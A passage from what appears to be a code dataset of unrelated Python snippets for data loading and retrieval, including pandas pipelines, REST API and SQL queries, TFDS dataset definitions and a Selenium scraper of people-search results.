1\n for m in data[1]:\n print(str(i) + '. ')\n for n in m:\n print(str(n) + ': ' + str(m[n]))\n i += 1\n print('\\n')", "def data_dict0():\n\n # 0- Sample from detectron2 -> 5 different sections.\n info_val0 = [{\"date_created\": \"2020-03-15 04:59:45.442988\",\n \"description\": \"Automatically generated COCO json file for Detectron2.\"}]\n images0 = [{\"id\": \"image\", \"width\": 100,\n \"height\": 100, \"file_name\": \"image.png\"}]\n annotations0 = [{\"id\": 1, \"image_id\": \"image\", \"bbox\": [70.0, 30.0, 30.0, 40.0],\n \"area\": 1200.0, \"iscrowd\": 0, \"category_id\": 0}]\n categories0 = [{\"id\": 0, \"name\": \"first\"}]\n licence0 = 'null'\n\n return [{\"info\": info_val0,\n \"images\": images0,\n \"annotations\": annotations0,\n \"categories\": categories0,\n \"licenses\": licence0}]", "def _info(self) -> tfds.core.DatasetInfo:\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict({\n 'id': tfds.features.Text(),\n 'program': tfds.features.Text(),\n 'date': tfds.features.Text(),\n 'url': tfds.features.Text(),\n 'summary': tfds.features.Text(),\n 'utt': tfds.features.Sequence(tfds.features.Text()),\n 'speaker': tfds.features.Sequence(tfds.features.Text()),\n }),\n supervised_keys=('utt', 'summary'),\n homepage='https://github.com/zcgzcgzcg1/MediaSum',\n citation=_CITATION,\n )", "def precip():\n date_prcp=session.query(measurements.date,measurements.prcp).all()\n date_prcp_df=pd.DataFrame(date_prcp).set_index('date')\n date_prcp_dict=date_prcp_df.to_dict()\n return jsonify(date_prcp_dict)", "def precipitation():\r\n # Query all measurements\r\n results = session.query(Measurement).all()\r\n\r\n # Create a dictionary from the row data and append to a list of all_precipitation\r\n all_precipitation = []\r\n\r\n for row in results:\r\n precipitation_dict = { row.date : row.prcp}\r\n all_precipitation.append(precipitation_dict)\r\n # print(all_precipitation)\r\n return jsonify(all_precipitation)", "def dataset_grabber(sess, link):\n json_dict = sess.get(link).json()\n if '.geojson' in link:\n dataset = gpd.GeoDataFrame.from_features(json_dict['features'])\n else:\n dataset = pd.DataFrame(json_dict)\n return dataset", "def get_pr_info(num):\r\n url = \"https://api.github.com/repos/edx/edx-platform/pulls/{num}\".format(num=num)\r\n username, token = get_github_creds()\r\n headers = {\r\n \"Authorization\": \"token {}\".format(token),\r\n \"User-Agent\": \"edx-release\",\r\n }\r\n response = requests.get(url, headers=headers)\r\n result = response.json()\r\n if not response.ok:\r\n raise requests.exceptions.RequestException(result[\"message\"])\r\n return result", "def fetch(url, header_path, id, ip, dbase, targets_table):\n # url = 'http://esimbad/testGSAV7/reslabo?FENID=resLaboPatDitep&NIP={}' \\\n # '&STARTDATE={}&ENDDATE={}'\n\n # header_path = '~/workspace/data/biology/header.csv'\n # constant names specific to our database\n KEY1 = 'id'\n KEY2 = 'NIP'\n C1J1 = 'C1J1'\n\n header = pd.read_csv(header_path, sep=';', encoding='latin1').columns\n\n\n engine = get_engine(id, ip, dbase)\n\n df_ids = sql2df(engine, targets_table)[[KEY1, 'nip', C1J1]]\n df_ids.rename({'nip': KEY2}, inplace=True, axis=1)\n df_ids['patient_id'] = df_ids[KEY1]\n\n cols = [KEY2, 'Analyse', 'Resultat', 'Date prelvt']\n df_res = pd.DataFrame(data=None, columns=cols)\n\n for index, row in df_ids.iterrows():\n nip = row[KEY2].replace(' ', '')\n patient_id = row['patient_id']\n c1j1_date = row[C1J1].date()\n start_date = c1j1_date - timedelta(weeks=8)\n\n c1j1 = str(c1j1_date).replace('-', '')\n start = str(start_date).replace('-', '')\n\n req = requests.get(url.format(nip, start, c1j1))\n values = BeautifulSoup(req.content, 'html.parser').body.text\n\n new_df = pd.read_csv(StringIO(values), sep=';', header=None,\n index_col=False, names=header)\n new_df = new_df.loc[:, cols + ['LC']] # remove LC\n\n # normalize nip\n new_df[KEY2] = row[KEY2]\n # new_df[KEY2] = new_df[KEY2].map(str)\n # new_df[KEY2] = [nip[:4] + '-' + nip[4:] for nip in new_df[KEY2]]\n\n new_df.drop('LC', axis=1, inplace=True)\n\n df_res = pd.concat([df_res, new_df], axis=0,\n sort=False, ignore_index=True)\n\n return df_res", "def extract_all_lazy():\n\n\t#Construct filepaths: Data COMP_INFO_1\n\tdata_ci1_name = \"DATA_2016_COMP_INFO_1.csv\"\n\tdata_ci1_fullname = os.path.join(files_location, data_ci1_name)\n\t#Data COMP_INFO_2\n\tdata_ci2_name = \"DATA_2016_COMP_INFO_2.csv\"\n\tdata_ci2_fullname = os.path.join(files_location, data_ci2_name)\n\t#Data PROPERTY INFO\n\tdata_pi_name = \"DATA_2016_PROPERTY_INFO_ST.csv\"\n\tdata_pi_fullname = os.path.join(files_location, data_pi_name)\n\t#Data General Info\n\tdata_gi_name = \"DATA_2016_GENERAL_INFO.csv\"\n\tdata_gi_fullname = os.path.join(files_location, data_gi_name)\n\n\t#Read & Process COMP_INFO\n\tdata_ci1 = pd.read_csv(data_ci1_fullname, skiprows=2, usecols = constants.keep_columns_CI, encoding='ISO-8859-1')\n\tdata_ci2 = pd.read_csv(data_ci2_fullname, skiprows=2, usecols = constants.keep_columns_CI, encoding='ISO-8859-1')\n\n\tdata_ci = data_ci1.append(data_ci2)\n\tdata_ci['QUESTION'] = data_ci['QUESTION'].replace(constants.ci_mapping)\n\t# Take only the survey questions mapped\n\tdata_ci = data_ci[data_ci['QUESTION'].isin(constants.ci_mapping.values())]\n\tdata_ci = data_ci.set_index(['PROPERTY_CODE','PROPERTY_NAME','JOB_CODE','POSITION'])\n\tdata_ci = data_ci.pivot(columns=\"QUESTION\")\n\tdata_ci.columns = [\"_\".join(pair) for pair in data_ci.columns]\n\tdata_ci = data_ci.reset_index()\n\n\t#Read & Process Property Info data\n\tdata_pi = pd.read_csv(data_pi_fullname, usecols = constants.keep_columns_PI, encoding='ISO-8859-1')\n\t#survey_type_transformed = transform.surveytype_categorical(data_pi)\n\t#data_pi = pd.merge(data_pi, survey_type_transformed, on=['PROPERTY_CODE'])\n\n\t#Read & Process General Info\n\tdata_gi = pd.read_csv(data_gi_fullname, skiprows = 2, usecols = constants.keep_columns_GI, encoding='ISO-8859-1')\n\tdata_gi['QUESTION'] = data_gi['QUESTION'].replace(constants.gi_mapping)\n\t# Take onl the survey questions mapped\n\tdata_gi = data_gi[data_gi['QUESTION'].isin(constants.gi_mapping.values())]\n\tdata_gi = data_gi.set_index(['PROPERTY_CODE','PROPERTY_NAME'])\n\tdata_gi = data_gi.pivot(columns=\"QUESTION\")\n\tdata_gi.columns = [\"_\".join(pair) for pair in data_gi.columns]\n\tdata_gi = data_gi.reset_index()\n\n\t#This frame needs to be reworked\n\td_ci = pd.merge(data_gi, data_pi, on = ['PROPERTY_CODE','PROPERTY_NAME'])\n\td_ci = pd.merge(d_ci, data_ci, on = ['PROPERTY_CODE','PROPERTY_NAME'],suffixes= ['_ci','_gi'])\n\n\t#Observations by Dimensions to determine top X markets\n\t#Can this be in a better position?\n\td_ci = d_ci[~(d_ci['PROPERTY_NAME'].isin(constants.del_rows_property_name))]\n\td_ci['POSITION'] = d_ci['POSITION'].astype(str)\n\n\tpayload = {}\n\tpayload['gi'] = data_gi\n\tpayload['pi'] = data_pi\n\tpayload['ci'] = data_ci\n\tpayload['d_ci'] = d_ci\n\n\treturn payload", "def _fetch_idjj_data(year=None):\n try:\n if year is None:\n year = _get_max_year([11, 12, 34, 35]) + 1\n\n database = 'PrisonMain'\n tbl_admit = 'IDJJ_Admissions'\n tbl_exit = 'IDJJ_exits'\n cols = 'Age, SFY, County, sex, race, admtypo, OFFTYPE9, hclass'\n condition = f'SFY = {year}'\n\n df_a = _fetch_from_ms_sql_server(database, tbl_admit, cols, condition)\n df_e = _fetch_from_ms_sql_server(database, tbl_exit, 'Exit'+cols, condition)\n\n return (\n pd.DataFrame()\n .append(_tranform_idjj(df_a))\n .append(_tranform_idjj(df_a, age1720=True))\n .append(_tranform_idjj(df_e, exit=True))\n .append(_tranform_idjj(df_e, age1720=True, exit=True))\n )\n except:\n raise", "def fetch_tikhonov_data(dpath='/tmp/glm-tools'):\n if os.path.exists(dpath):\n shutil.rmtree(dpath)\n os.mkdir(dpath)\n\n base_url = \"https://raw.githubusercontent.com/glm-tools/datasets/master\"\n url = os.path.join(base_url, \"tikhonov/fixations.csv\")\n fname = os.path.join(dpath, 'fixations.csv')\n urllib.urlretrieve(url, fname)\n fixations_df = pd.read_csv(fname)\n\n url = os.path.join(base_url, \"tikhonov/probes.csv\")\n fname = os.path.join(dpath, 'probes.csv')\n urllib.urlretrieve(url, fname)\n probes_df = pd.read_csv(fname)\n\n url = os.path.join(base_url, \"tikhonov/spiketimes.csv\")\n fname = os.path.join(dpath, 'spiketimes.csv')\n urllib.urlretrieve(url, fname)\n spikes_df = pd.read_csv(fname, header=None)\n\n return fixations_df, probes_df, spikes_df", "def get_metadata_list(path, file, task_description, dataset_description):\n df = pd.read_csv(os.path.join(path, file), sep='\\t')\n\n for column in COMMON_FIELDS:\n if column not in df.columns:\n logging.getLogger('zenodo_upload').critical('File {} is missing column {}'.format(os.path.join(path, file), column))\n exit(1)\n\n df = df[(df['DOI'].str.lower() == 'new') | (df['DOI'].isna())]\n if df.empty:\n return None\n\n metadata_list = []\n for index, row in df.iterrows():\n title = ' '.join([row['Software'], row['Version'], task_description, 'of the', dataset_description + ', samples ' + row['SamplesUsed']])\n\n row_copy= row.copy().drop(COMMON_FIELDS).dropna()\n if 'Description' in row_copy.index:\n description = row_copy.pop('Description') + '<br>'\n else:\n description = ''\n description += '<strong>Software: </strong>' + row['Software'] + '<br>'\n description += '<strong>SoftwareVersion: </strong>' + str(row['Version']) + '<br>'\n description += '<strong>DataURL: </strong> https://data.cami-challenge.org/participate'\n for item in row_copy.iteritems():\n if len(description) > 0:\n description = description + '<br>'\n description = description + str('<strong>' + item[0]) + ':</strong> ' + str(item[1])\n\n creators_metadata = get_creators_metadata(row)\n metadata = {\n 'metadata': {\n 'title': title,\n 'upload_type': 'dataset',\n 'communities': [{'identifier': 'cami'}],\n 'description': description,\n 'creators': creators_metadata,\n 'access_right': 'open',\n 'license': 'cc-by',\n 'version': row['Version'],\n 'keywords': KEYWORDS + [task_description, dataset_description]\n },\n 'files': row['FileName']\n }\n metadata_list.append(metadata)\n return metadata_list", "def data_frame_info(self):\r\n print(self.dataframe_name)\r\n print(self.data_frame.info())", "def _read_projects_df_from_db(self, include_stats=True):\n\n projects_df = None\n\n # TODO: should cursor be created here or no?\n # https://www.datacamp.com/community/tutorials/tutorial-postgresql-python # noqa\n # shows creation of a cursor even though no methods are called on it\n with self._transaction.dict_cursor():\n # TODO: is there a better way to access this?\n conn = self._transaction._conn\n\n queries = _PROJECT_SQLS if include_stats else [_PROJECT_SQLS[0]]\n for stats_keys, sql_source in queries:\n if callable(sql_source):\n curr_sql = sql_source(*stats_keys)\n else:\n curr_sql = sql_source.format(*stats_keys)\n\n curr_df = pd.read_sql(curr_sql, conn)\n\n if projects_df is None:\n projects_df = curr_df\n else:\n # left join here: the first query produces a df with a\n # COMPLETE list of all projects, whereas subsequent\n # queries only return info on projects relevant to their\n # computed statistic.\n projects_df = pd.merge(projects_df, curr_df,\n how=\"left\", on=[\"project_id\"])\n\n # make the project_id the index of the final data frame, but\n # do NOT drop the project_id column from the data frame.\n projects_df.set_index('project_id', drop=False, inplace=True)\n return projects_df", "def get_info(now):\n url = 'https://api.stackexchange.com/2.2/info'\n payload = {\n 'site': 'stackoverflow'\n }\n result = requests.get(url, params=payload)\n # print(result.url) # https://api.stackexchange.com/2.2/info?site=stackoverflow\n result = result.json()\n items = result['items'][0]\n items_seq = {k:[v] for k, v in items.items()}\n df = pd.DataFrame(items_seq)\n df['time_requested'] = now\n return df", "def get_organisation_metadata() -> pd.DataFrame:\n return GETTER.organisationmetadata", "def identify_primary_reference_datasets(conn, log):\n\n primary_ref = {}\n\n primary_ref['refimg_id_ip'] = phot_db.find_primary_reference_image_for_field(conn)\n\n query = 'SELECT facility, filter, software FROM reference_images WHERE refimg_id=\"'+str(primary_ref['refimg_id_ip'])+'\"'\n t = phot_db.query_to_astropy_table(conn, query, args=())\n\n primary_ref['facility_id'] = t['facility'][0]\n primary_ref['software_id'] = t['software'][0]\n\n query = 'SELECT filter_id, filter_name FROM filters WHERE filter_name=\"ip\"'\n t = phot_db.query_to_astropy_table(conn, query, args=())\n primary_ref['ip'] = t['filter_id'][0]\n\n for f in ['rp', 'gp']:\n query = 'SELECT filter_id, filter_name FROM filters WHERE filter_name=\"'+f+'\"'\n t = phot_db.query_to_astropy_table(conn, query, args=())\n primary_ref[f] = t['filter_id'][0]\n\n query = 'SELECT refimg_id FROM reference_images WHERE facility=\"'+str(primary_ref['facility_id'])+\\\n '\" AND software=\"'+str(primary_ref['software_id'])+\\\n '\" AND filter=\"'+str(t['filter_id'][0])+'\"'\n qs = phot_db.query_to_astropy_table(conn, query, args=())\n\n if len(qs) > 0:\n primary_ref['refimg_id_'+f] = qs['refimg_id'][0]\n else:\n log.info('WARNING: Database contains no primary reference image data in filter '+f)\n\n log.info('Identified the primary reference datasets for this field as:')\n for key, value in primary_ref.items():\n log.info(str(key)+' = '+str(value))\n\n return primary_ref", "async def get_project_info(project_urls):\n project_info = []\n for url in project_urls:\n soup = await get_page(url)\n about = soup.find_all(\"p\")\n title = soup.find(\"h3\").text\n student = about[0].text.splitlines()[2].strip()\n details = about[1].text\n name = about[0].find(\"a\").text\n project_info.append({'Organization': name, 'title': title,\n 'student': student, 'details': details,\n 'link': url})\n\n return project_info", "def update_datatable(clickData, selected_year, search_ids_keywords, search_keywords, selected_funding):\n\n prof_name = clickData['points'][0]['customdata']\n print(\"selected professor for network graph is \", prof_name)\n\n # TODO: Handle no search_ids or Nonetype search ids DONE\n # print(\" Search IDS ************* 8********** ****** here are this\", search_ids_keywords[0:,0])\n\n professor_data = funding_data[(funding_data['Lead Investigator:'] == prof_name)\n & (funding_data.start_year.isin(selected_year))\n # & (funding_data._id.isin(search_ids_keywords[0:,0]))\n & (funding_data['Program Cycle:'].isin(selected_funding))]\n\n if search_keywords and len(search_keywords) > 0:\n search_ids_keywords = json.loads(search_ids_keywords)\n search_ids_keywords = np.array(search_ids_keywords)\n professor_data = professor_data[(professor_data._id.isin(search_ids_keywords[0:, 0]))]\n\n\n # collaborating_personnel_counts = collaborating_personnel.investigator.value_counts()\n professor_data = professor_data[\n [\"Proposal Number:\", \"Proposal Title:\"]]\n\n # [\"Proposal Number:\", \"Submitting Institution Name:\", \"Project Status:\", \"Proposal Title:\"]]\n return professor_data.to_dict(\"rows\")\n # return professor_data", "def info(self):\n for key, value in self.dataset['info'].items():\n print('{}: {}'.format(key, value))", "def extract_depto(succId = 439) :\n deps_api = 'https://www.lacomer.com.mx/lacomer-api/api/v1/public/header/inicio?cambioSucc=false&succFmt=100&succId={}'.format(succId)\n deps_json = json.loads(requests.get(deps_api).text)['departamentos']\n deps_list = list(deps_json.keys())\n deps_df = []\n\n for depto in deps_list :\n \n tmp = pd.DataFrame(deps_json[depto])\n tmp['dept'] = depto\n deps_df.append(tmp)\n \n deps_df = pd.concat(deps_df)\n deps_df['dept'].unique()\n\n sucursales = extract_sucursales()\n deps_df['succId'] = succId\n deps_df['sucursal'] = sucursales.loc[sucursales['id'] == succId,'sucursal'].iloc[0]\n\n return deps_df", "def create_df(link=config.api_link, key=config.api_key, master_file = 'pvd_crime_master.csv'):\n #only want reports we don't already have, so what is the most recent date in the master\n master = pd.read_csv(master_file, nrows=1)\n most_recent = pd.to_datetime(master['reported_date'])[0]\n most_recent_format = most_recent.strftime('%Y-%m-%dT%H:%M:%S.000')\n\n headers = {'Authentication': key} #api_key\n \n query = \"SELECT * WHERE reported_date > '\"+most_recent_format+\"' ORDER BY reported_date LIMIT 13000\"\n\n params = {'$query': query}\n\n response = requests.get(link, headers=headers, params=params) #json data\n response_json = response.json() #json data as list of dictionaries\n \n #create and return pandas DataFrame of json response\n\n return pd.DataFrame(response_json)", "def load_data():\n df = pd.read_csv(\"https://raw.githubusercontent.com/Andrea-Giuliani/Python-Project/master/data/final_dataset.csv\",sep=',') \n return df", "def test_project_detail(self):\n rv = self.app.get(\"/Assignment0\")\n self.assertIn(\"Assignment0\", rv.data)\n self.assertIn(\"2015-02-04 21:57:12.156363\", rv.data)\n self.assertIn(\"221\", rv.data)\n self.assertIn(\"commit assignment0\", rv.data)\n\n self.assertIn(\"Assignment0/Procfile\", rv.data)\n self.assertIn(\"Assignment0/README.md\", rv.data)", "def getDatasetsProjectsFromImages(queryService, imageIds):\n ids = \",\".join([str(i) for i in imageIds])\n \n query_string = \"select i from Image i join fetch i.datasetLinks idl join fetch idl.parent d join fetch d.projectLinks pl join fetch pl.parent where i.id in (%s)\" % ids\n\n images = queryService.findAllByQuery(query_string, None)\n results = {}\n \n for i in images: # order of images not same as imageIds\n pdList = []\n imageId = i.getId().getValue()\n for link in i.iterateDatasetLinks():\n dataset = link.parent\n dName = dataset.getName().getValue()\n if dataset.sizeOfProjectLinks() == 0:\n pdList.append((\"\", dName))\n for dpLink in dataset.iterateProjectLinks():\n project = dpLink.parent\n pName = project.getName().getValue()\n pdList.append((pName, dName))\n results[imageId] = pdList\n \n # make sure the map contains all the imageIds\n for iId in imageIds:\n if iId not in results:\n results[iId] = []\n return results", "def load_landkreis_information():\n client = MongoClient(f'mongodb://{os.getenv(\"USR_\")}:{os.getenv(\"PWD_\")}@{os.getenv(\"REMOTE_HOST\")}:{os.getenv(\"REMOTE_PORT\")}/{os.getenv(\"AUTH_DB\")}')\n db = client[os.getenv(\"MAIN_DB\")]\n lk_collection = db[\"lk_overview\"]\n data = pd.DataFrame(list(lk_collection.find()))\n return data", "def get_dataset_details(name, analyst):\n\n template = None\n allowed_sources = user_sources(analyst)\n dataset_object = Dataset.objects(name = name,\n source__name__in=allowed_sources).first()\n if not dataset_object:\n error = (\"Either no data exists for this dataset\"\n \" or you do not have permission to view it.\")\n template = \"error.html\"\n args = {'error': error}\n return template, args\n\n dataset_object.sanitize_sources(username=\"%s\" % analyst,\n sources=allowed_sources)\n\n # remove pending notifications for user\n remove_user_from_notification(\"%s\" % analyst, dataset_object.id, 'Dataset')\n\n # subscription\n subscription = {\n 'type': 'Dataset',\n 'id': dataset_object.id,\n 'subscribed': is_user_subscribed(\"%s\" % analyst,\n 'Dataset',\n dataset_object.id),\n }\n\n #objects\n objects = dataset_object.sort_objects()\n\n #relationships\n relationships = dataset_object.sort_relationships(\"%s\" % analyst, meta=True)\n\n # relationship\n relationship = {\n 'type': 'Datset',\n 'value': dataset_object.id\n }\n\n #comments\n comments = {'comments': dataset_object.get_comments(),\n 'url_key':dataset_object.name}\n\n # favorites\n favorite = is_user_favorite(\"%s\" % analyst, 'Dataset', dataset_object.id)\n\n # services\n service_list = get_supported_services('Dataset')\n\n # analysis results\n service_results = dataset_object.get_analysis_results()\n\n args = {'dataset': dataset_object,\n 'objects': objects,\n 'relationships': relationships,\n 'comments': comments,\n 'favorite': favorite,\n 'relationship': relationship,\n 'subscription': subscription,\n 'name': dataset_object.name,\n 'service_list': service_list,\n 'service_results': service_results}\n\n return template, args", "def build_person_df(person):\n data = {\n \"act\" : [],\n \"modes\": [],\n \"start_time\": [],\n \"end_time\": [],\n \"dur\": [],\n }\n for component in person.plan.day:\n data[\"act\"].append(component.act.lower().title())\n if isinstance(component, activity.Leg):\n data[\"modes\"].append(component.mode.lower().title())\n else:\n data[\"modes\"].append(None)\n data[\"start_time\"].append(component.start_time.hour + component.start_time.minute/60)\n data[\"end_time\"].append(component.end_time.hour + component.end_time.minute/60)\n data[\"dur\"].append(component.duration.total_seconds()/3600)\n df = pd.DataFrame(data)\n df['pid'] = person.pid\n\n return df", "def download(self, verbose):\n\n # Download datasets\n if verbose:\n print(\"Retrieving datasets from COVID-19 Open Data by Google Cloud Platform https://github.com/GoogleCloudPlatform/covid-19-open-data\")\n # Index\n i_cols = [\"location_key\", \"country_name\", \"subregion1_name\", \"subregion2_name\", \"iso_3166_1_alpha_3\"]\n i_df = pd.read_csv(self.URL_I, usecols=i_cols)\n # Mobility\n m_df = pd.read_csv(self.URL_M)\n m_df = (m_df.set_index([\"date\", \"location_key\"]) + 100).reset_index()\n # Combine data\n df = m_df.merge(i_df, how=\"left\", on=\"location_key\")\n # Location (country/province)\n df = df.loc[df[\"subregion2_name\"].isna()]\n df[self.PROVINCE] = df[\"subregion1_name\"].fillna(self.UNKNOWN).apply(unidecode)\n df[\"country_name\"] = df[\"country_name\"].replace(\n {\n # CIV\n \"Ivory Coast\": \"Cote d'Ivoire\",\n }\n )\n return df", "def extract_details(df):\n df_RSinfo = df[['pentamer', 'Step details', 'RouteScore details',\n 'Isolated', 'RouteScore', 'log(RouteScore)']]\n\n last3_rxns = ['Buchwald_deprotection', 'Buchwald', 'SNAr']\n for rxn in last3_rxns:\n df_RSinfo[rxn] = [next(step for step in row[-3:] if step['reaction'] == rxn) for row in df['Step details']]\n\n for key in df_RSinfo['RouteScore details'][0].keys():\n df_RSinfo[key] = [row[key] for row in df['RouteScore details']]\n\n return df_RSinfo", "async def get_all_record():\n # X_new = item.to_df()\n # item_str = item.to_string()\n # project_code = int(item_str[item_str.find('=')+1:])\n pg = PostgreSQL()\n return_json = pg.fetch_all_records()\n return return_json", "def _info(self) -> tfds.core.DatasetInfo:\n features = {\n # sequence of [RGB, depth] images\n \"image\": tfds.features.Sequence(\n tfds.features.Image(shape=(600, 800, 3)), length=2,\n ),\n # sequence of image features for [RGB, depth]\n \"images\": tfds.features.Sequence(\n tfds.features.FeaturesDict(\n {\n \"file_name\": tfds.features.Text(),\n \"height\": tf.int64,\n \"width\": tf.int64,\n \"id\": tf.int64,\n },\n ),\n length=2,\n ),\n # both modalities share the same categories\n \"categories\": tfds.features.Sequence(\n tfds.features.FeaturesDict(\n {\n \"id\": tf.int64, # {'pedstrian':1, 'vehicles':2, 'trafficlight':3, 'patch':4}\n \"name\": tfds.features.Text(),\n }\n )\n ),\n # both modalities share the same objects\n \"objects\": tfds.features.Sequence(\n {\n \"id\": tf.int64,\n \"image_id\": tf.int64,\n \"area\": tf.int64, # un-normalized area\n \"boxes\": tfds.features.BBoxFeature(), # normalized bounding box [ymin, xmin, ymax, xmax]\n \"labels\": tfds.features.ClassLabel(num_classes=5),\n \"is_crowd\": tf.bool,\n }\n ),\n # these data only apply to the \"green screen patch\" objects, which both modalities share\n \"patch_metadata\": tfds.features.FeaturesDict(\n {\n \"gs_coords\": tfds.features.Sequence(\n tfds.features.Tensor(\n shape=[2], dtype=tf.int64\n ), # green screen vertices in (x,y)\n length=4, # always rectangle shape\n ),\n \"cc_ground_truth\": tfds.features.Tensor(\n shape=[24, 3], dtype=tf.float32\n ), # colorchecker color ground truth\n \"cc_scene\": tfds.features.Tensor(\n shape=[24, 3], dtype=tf.float32\n ), # colorchecker colors in a scene\n # binarized segmentation mask of patch.\n # mask[x,y] == 1 indicates patch pixel; 0 otherwise\n \"mask\": tfds.features.Tensor(shape=[600, 800, 3], dtype=tf.uint8),\n \"shape\": tfds.features.Text(),\n }\n ),\n }\n\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict(features),\n citation=_CITATION,\n )", "def names():\n\n df = pd.read_sql_query(f\"SELECT * FROM olympics_raw\", con = engine)\n print(df.head())\n \n\n # return jsonify(all_olympians)\n return jsonify(df.to_dict(orient='records'))", "def getprojects(self):\n resp = self.conn.request('GET', self.URLS['allprojects'], dict(api_key=self.api_key))\n data = resp.data.decode('utf-8')\n jdata = json.loads(data)['projects']\n # Convert nested JSON documents\n for project_index in range(len(jdata)):\n for field in ('options_json', 'templates_json'):\n jdata[project_index][field] = json.loads(jdata[project_index][field])\n # Pass project details dictionaries to constructors, return array\n return [PhProject(self, project) for project in jdata]", "def get_data(self):\n def _clean_search_hit(search_hit):\n \"\"\"\n Takes in a search result hit as a BeautifySoup tag and pulls out all the data to match the desired schema.\n\n :param search_hit:\n :return Dictionary: A dictionary with the cleaned data\n \"\"\"\n\n hit_name = search_hit.find(class_='hit-name')\n hit_url = hit_name.get('href')\n hit_id = hit_url.split('/')[-1]\n name = hit_name.get_text().split(',')[0].title().split()\n\n current_city = search_hit.find(class_='hit-location').get_text().upper()\n\n # Find all Addresses for search result.\n try:\n address = search_hit.find(class_='hit-pastAddresses').find_all(class_='hit-values')\n address = list({a.text.upper().replace('.', '') for a in address})\n except AttributeError:\n address = list()\n\n # find the address that is most likely the current main address.\n try:\n address.insert(0, address.pop(address.index(current_city)))\n except ValueError:\n address.insert(0, current_city)\n\n address = [\n {\n '@type': 'PostalAddress',\n 'addressLocality': locality.title(),\n 'addressRegion': region\n } for locality, region in [a.split(', ') for a in address]]\n\n work_location = {'@type': 'Place'}\n try:\n work_location['name'] = search_hit\\\n .find(class_='hit-work')\\\n .find(class_='hit-values')\\\n .get_text()\\\n .title()\n except AttributeError:\n work_location['name'] = ''\n\n alumni_of = {'@type': 'EducationalOrganization'}\n try:\n alumni_of['name'] = search_hit\\\n .find(class_='hit-high-school')\\\n .find(class_='hit-values')\\\n .get_text().title()\n except AttributeError:\n pass\n\n return {\n '@id': hit_id,\n '@type': 'Person',\n 'name': ' '.join(name),\n 'givenName': name[0],\n 'middleName': ' '.join(name[1:-1]),\n 'familyName': name[-1],\n 'url': hit_url,\n 'address': address,\n 'workLocation': work_location,\n 'alumniOf': alumni_of,\n }\n\n def _refine_search(search_str, options):\n \"\"\"\n Takes a list of WebElements and a search string, looks for string in the text of each WebElement, and\n press the option if found. Returns Boolean for found status\n\n :param search_str: str of the desired option.\n :param options: list of WebElements from Beautify Soup that represents all of the available options.\n :return:\n \"\"\"\n search_str = search_str.upper()\n logging.info(f'Looking for \\'{search_str}\\'')\n try:\n for option in options:\n option_text = option.text.upper()\n logging.info(f'Option Checked: {option_text}')\n if search_str in option_text:\n option.click()\n time.sleep(2)\n logging.info(f'Option Selected: {option_text}')\n return True\n else:\n return False\n except AttributeError:\n return True\n except StaleElementReferenceException as e:\n ChromeCrash(e)\n\n with self.driver(executable_path=self.DRIVER_DIR) as driver:\n driver.get(self.url)\n\n \"\"\"\n The CSS for the page doesn't show the State nor the City selector options if the page is too narrow,\n so we need to make sure the browser is open wide enough for the CSS to make those options visible. \n \"\"\"\n driver.fullscreen_window()\n\n # Refine the search by State\n address_region = self.person.get('addressRegion', '')\n address_region = STATES.get(address_region.upper(), address_region.upper())\n region_options = driver\\\n .find_element_by_class_name(\"STATE\")\\\n .find_elements_by_class_name(\"refinementList-text\")\n\n if not _refine_search(address_region, region_options):\n return False\n\n # Narrow the search by pressing a City option\n address_locality = self.person.get('addressLocality').title()\n locality_options = driver\\\n .find_element_by_class_name(\"CITY\")\\\n .find_elements_by_class_name(\"refinementList-text\")\n\n if not _refine_search(address_locality, locality_options):\n return False\n\n \"\"\"\n The Page Loads dynamically, so we need to scroll down the page to show all the search results. It needs to\n be done in steps with a pause between movements to allow for loading. \n Here it will first get the current location on the page, attempt to move down the page, and then check to\n see if the location changed.\n \"\"\"\n\n if self.auto_scroll and len(driver.find_elements_by_class_name(\"ais-InfiniteHits-item\")) > 15:\n current_height, new_height = 0, driver.execute_script(\"return document.body.scrollHeight\")\n\n while new_height != current_height:\n # Scroll down to the bottom of the page\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n current_height, new_height = new_height, driver.execute_script(\"return document.body.scrollHeight\")\n\n page_source = driver.page_source\n page_soup = bs(page_source, 'html.parser')\n search_results = list(page_soup.find_all(class_='ais-InfiniteHits-item'))\n for i, search_result in enumerate(search_results):\n search_results[i] = _clean_search_hit(search_result)\n\n self.data_from_website = pd.DataFrame(search_results)\n self.data_from_website.set_index('@id', inplace=True)\n return True", "def glass_pandas(self):\n # pandas.set_option('display.width', 120)\n # TODO timeit (git_implementation) vs (my_implementation)\n # * df = pd.DataFrame(json.loads(r.text))\n # * df = df.set_index('t')\n # * df.index = pd.to_datetime(df.index, unit='s')\n # * df = df.sort_index()\n # * s = df.v\n # * s.name = '_'.join(url.split('/')[-2:])\n # * return s\n # for elem in self.loaded:\n # _metric, _data = elem[1]['_metrics'], elem[1]['_data']\n # try:\n # frame_keys = ['t'] + list(_data[0]['o'].keys())\n # framed = pandas.DataFrame(\n # data=[{k: (_data[iters]['t'] if k in 't' else _data[iters]['o'][k])\n # for k in frame_keys} for iters in range(len(_data))],\n # columns=frame_keys)\n # except KeyError:\n # framed = pandas.DataFrame(_data)\n # framed.set_index('t', inplace=True)\n # framed.index = pandas.to_datetime(\n # framed.index.to_flat_index(), unit='s', infer_datetime_format=True)\n # framed.sort_index(inplace=True)\n # framed.name = _metric\n # print(framed.name)\n # print(framed)", "def get_info_from_row(r):\n cells = r.select(\"td\") \n # we want this data point if theres a zip, save all the info\n # including lat, long, type, \n if len(cells) > 10 and cells[2].select(\"a\"):\n id_ = re.sub(\"[^\\w\\. ]\", \"\",cells[0].text)\n data_anchor = cells[2].select(\"a\")[0]\n href = data_anchor[\"href\"]\n desc = cells[3].text\n type_ = cells[4].text\n med_ec = cells[8].text\n flow = re.sub(\"[^\\w\\.]\", \"\",cells[9].text)\n lat = re.sub(\"[^\\w\\.]\", \"\",cells[10].text)\n lon = re.sub(\"[^\\w\\.]\", \"\",cells[11].text)\n \n return {\"id\":id_, \"desc\":desc, \"type\":type_, \"med_ec\":med_ec, \"flow\":flow, \"lat\":lat, \"lon\":lon, \"href\":href}" ]
